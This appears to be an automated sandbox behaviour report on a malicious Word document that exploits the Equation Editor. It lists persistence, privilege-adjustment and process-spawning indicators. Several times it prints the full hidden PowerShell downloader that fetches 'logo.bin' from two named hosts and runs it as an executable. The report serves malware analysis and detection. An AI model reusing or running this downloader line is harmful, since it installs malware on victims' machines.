Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,18_2_00415D50
PE file contains an invalid checksum
Source: ounehcnaykuL.exe.10.dr | Static PE information: real checksum: 0x24b51 should be: 0x46e3d
Source: ounehcnaykuM.exe.15.dr | Static PE information: real checksum: 0x24b51 should be: 0x46e3d
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_00415CCB push ebx; ret 18_2_00415CCC
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_001F3959 push ecx; ret 18_2_001F396C
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 21_2_00415CCB push ebx; ret 21_2_00415CCC
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 21_2_00183959 push ecx; ret 21_2_0018396C

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001E2530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,18_2_001E2530
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_00172530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,21_2_00172530

System Summary:

Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 492AAF70E95987373A3C01F6AFA10C9F064D756871D6B02D7F65E03E70E92AC9
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe 492AAF70E95987373A3C01F6AFA10C9F064D756871D6B02D7F65E03E70E92AC9
Powershell connects to network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Network Connect: 87.247.241.143 80
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,18_2_00415D50
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001E67C0 NtQueryInformationProcess,18_2_001E67C0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,21_2_00415D50
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_001767C0 NtQueryInformationProcess,NtQueryInformationProcess,21_2_001767C0
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001EC430 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_001EC430
Creates files inside the system directory
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe File created: C:\Windows\TEMP\~DF7F9397C12E76BC41.TMP
Creates mutexes
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Mutant created: \Sessions\1\BaseNamedObjects\789C000000000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Mutant created: \BaseNamedObjects\789C000000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Deletes Windows files
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe File deleted: C:\Windows\Temp\VBB688.tmp
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001EFE30
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001F21B0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_0017FE30
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_001821B0
Document contains no OLE stream with summary information
Source: VBA869.tmp.14.dr OLE indicator has summary info: false
Source: VB8E64.tmp.16.dr OLE indicator has summary info: false
Source: VBB688.tmp.20.dr OLE indicator has summary info: false
Document has an unknown application name
Source: VBA869.tmp.14.dr OLE indicator application name: unknown
Source: VB8E64.tmp.16.dr OLE indicator application name: unknown
Source: VBB688.tmp.20.dr OLE indicator application name: unknown
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: VBA869.tmp.14.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: VB8E64.tmp.16.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: VBB688.tmp.20.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: ounehcnaykuL.exe.10.dr Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: ounehcnaykuM.exe.15.dr Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe File read: C:\Windows\System32\drivers\etc\hosts
Binary contains paths to development resources
Source: ounehcnaykuM.exe, 00000010.00000000.10221288120.00401000.00000020.sdmp, ounehcnaykuM.exe, 00000012.00000000.10355250967.00401000.00000020.sdmp, ounehcnaykuM.exe, 00000014.00000000.10399473117.00401000.00000020.sdmp, ounehcnaykuM.exe, 00000015.00000000.10613423172.00401000.00000020.sdmp, ounehcnaykuL.exe.10.dr Binary or memory string: @pA*\AE:\56202002\Likelihood.vbp
Source: ounehcnaykuM.exe, 00000010.00000001.10223541229.00417000.00000004.sdmp, ounehcnaykuM.exe, 00000014.00000002.10617465195.00417000.00000004.sdmp Binary or memory string: @*\AE:\56202002\Likelihood.vbp
Classification label
Source: classification engine Classification label: mal100.evad.expl.troj.winDOCX@23/42@10/4
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001F3130 LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,18_2_001F3130
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001EFBD0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_001EFBD0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001EC430 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_001EC430
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_0017C430 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle,21_2_0017C430
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_0017FBD0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,21_2_0017FBD0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 21_2_00183130 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,21_2_00183130
Contains functionality to enum processes or threads
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001E7850 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,Process32NextW,OpenProcess,CloseHandle,18_2_001E7850
Contains functionality to instantiate COM classes
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001EEAC0 CoCreateInstance,CoCreateInstance,CoCreateInstance,18_2_001EEAC0
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Code function: 18_2_001EF7D0 FindResourceW,LoadResource,LockResource,18_2_001EF7D0
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$RMP16T.docx
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user~1\AppData\Local\Temp\CVRB147.tmp
Document contains summary information with irregular field values
Source: VBA869.tmp.14.dr OLE document summary: title field not present or empty
Source: VBA869.tmp.14.dr OLE document summary: author field not present or empty
Source: VBA869.tmp.14.dr OLE document summary: edited time not present or 0
Source: VB8E64.tmp.16.dr OLE document summary: title field not present or empty
Source: VB8E64.tmp.16.dr OLE document summary: author field not present or empty
Source: VB8E64.tmp.16.dr OLE document summary: edited time not present or 0
Source: VBB688.tmp.20.dr OLE document summary: title field not present or empty
Source: VBB688.tmp.20.dr OLE document summary: author field not present or empty
Source: VBB688.tmp.20.dr OLE document summary: edited time not present or 0
Executes batch files
Source: unknown Process created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU c
Found command line output
Source: C:\Windows\System32\cmd.exe Console Write: ............................l...x...@...+...........................A.p.p.D.a.t.a.\.L.o.c.a.Z!.|..+.H.+......EZJ....@.+.
Source: C:\Windows\System32\cmd.exe Console Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.................@.[J..+...>w@.[J..C.....L.+.(.....+....v..+.
Source: C:\Windows\System32\cmd.exe Console Write: ....................c.a.l.l.l...x...@...7.....................................+..b=w..Du`...L.+.T.+...+................v
Source: C:\Windows\System32\cmd.exe Console Write: ......................0.....l...x...@...=.............................................+..b=w.<.|X.+.....j....EZJ......+.
Source: C:\Windows\System32\cmd.exe Console Write: ............................l...x...@...E...............................j...............@F[J.<.|x.+...+......EZJ......+.
Source: C:\Windows\System32\cmd.exe Console Write: ............................l...x...@...L...........................A.p.p.D.a.t.a.\.L.o.c.a..$.|..+...+......EZJ......+.
Source: C:\Windows\System32\cmd.exe Console Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........p.D.a.t.a.\.L.o.c.a..$.|..+.(.L...+.(.....+....v..+.
Source: C:\Windows\System32\cmd.exe Console Write: ....................#.c.a.l.c...e.x.e...X.............................C.<.XJ.....b=w..Du\.....+...+...+................v
Source: C:\Windows\System32\cmd.exe Console Write: ............................l...x...@...^.............................+...+.(.L.....(.L.....2&.|@.+...+......EZJ......+.
Source: C:\Windows\System32\cmd.exe Console Write: ........1#........... ..|.+...+.E.XJ........1#......@F[J. ..|.+...C.....V.XJ............|.+.......}u........`.....,.....
Source: C:\Windows\System32\cmd.exe Console Write: ............................l...x...@...v...........................A.p.p.D.a.t.a.\.L.o.c.a..$.|..+...+......EZJ......+.
Source: C:\Windows\System32\cmd.exe Console Write: ....................P.o.w.e.r.S.h.e.l.l.......................................+..b=w..Du\.....+...+...+................v
Source: C:\Windows\System32\cmd.exe Console Write: ......................0.....l...x...@.................................................+..b=w.&.| .+..........EZJ......+.
Source: C:\Windows\System32\cmd.exe Console Write: ............................l...x...@...................................................@F[J2&.|@.+...+......EZJ......+.
Source: C:\Windows\System32\cmd.exe Console Write: ........1#........... ..(.+...+.E.XJ........1#......@F[J. ..(.+...C.....V.XJ............(.+.......}u........`.....,.....
Parts of this application are using VB runtime library 6.0 (probably coded in Visual Basic)
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe Section loaded: C:\Windows\System32\msvbvm60.dll
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Section loaded: C:\Windows\System32\msvbvm60.dll
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Section loaded: C:\Windows\System32\msvbvm60.dll
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\FORMP16T.docx
Source: unknown Process created: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT
Source: unknown Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU c
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {4FF6B578-0DC8-43D6-96ED-9BD735AC3890} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknown Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU c
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Process created: C:\Windows\System32\svchost.exe svchost.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Found graphical window changes (likely an installer)
Source: Window Recorder Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: mscorrc.pdb source: powershell.exe, 0000000A.00000002.10103033130.04DF0000.00000002.sdmp
Source: Binary string: C:\Users\jawa\Desktop\Response.pdb; source: powershell.exe, 0000000A.00000002.10095450491.01D62000.00000004.sdmp
Source: Binary string: C:\Users\jawa\Desktop\Response.pdb source: powershell.exe, 0000000A.00000002.10095450491.01D62000.00000004.sdmp, ounehcnaykuL.exe.10.dr
Source: Binary string: C:\Work\A_Modules\Sysinfo\x86\Release\GetSystemInfo.pdbHS source: ounehcnaykuM.exe, 00000015.00000002.10780399034.01CDA000.00000004.sdmp, svchost.exe, 00000017.00000000.10695933341.10001000.00000004.sdmp
Source: Binary string: C:\Work\A_Modules\Sysinfo\x86\Release\GetSystemInfo.pdb source: ounehcnaykuM.exe, 00000015.00000002.10780399034.01CDA000.00000004.sdmp, svchost.exe, 00000017.00000000.10695933341.10001000.00000004.sdmp
